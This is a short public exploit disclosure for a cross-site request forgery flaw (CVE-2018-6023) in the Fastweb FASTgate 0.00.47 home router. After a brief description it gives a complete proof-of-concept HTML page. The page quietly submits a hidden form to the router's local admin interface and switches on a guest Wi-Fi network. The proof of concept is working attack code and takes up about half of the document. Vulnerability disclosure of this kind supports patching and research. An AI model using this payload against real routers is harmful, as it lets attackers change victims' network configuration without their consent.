Fastweb FASTGate 0.00.47 Cross Site Request Forgery

`# Exploit Title: Fastweb FASTgate 0.00.47 CSRF  
# Date: 09-05-2018  
# Exploit Authors: Raffaele Sabato  
# Contact: https://twitter.com/syrion89  
# Vendor: Fastweb  
# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/  
# Version: 0.00.47  
# CVE: CVE-2018-6023  
  
I DESCRIPTION  
========================================================================  
  
An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site  
request forgery (CSRF) vulnerability allows remote attackers to hijack the  
authentication of users for requests that modify the configuration.  
This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password  
changing, etc.  
  
II PROOF OF CONCEPT  
========================================================================  
  
## Activate Gues Wi-Fi:  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://192.168.1.254/status.cgi">  
<input type="hidden" name="_" value="1516312144136" />  
<input type="hidden" name="act" value="nvset" />  
<input type="hidden" name="hotspot_broadcast_ssid" value="1" />  
<input type="hidden" name="hotspot_enable" value="1" />  
<input type="hidden" name="hotspot_filtering" value="all" />  
<input type="hidden" name="hotspot_security" value="WPA2PSK" />  
<input type="hidden" name="hotspot_ssid" value="GUEST-Test" />  
<input type="hidden" name="hotspot_timeout" value="-1" />  
<input type="hidden" name="service" value="wl_guestaccess" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
III REFERENCES  
========================================================================  
http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/  
  
  
`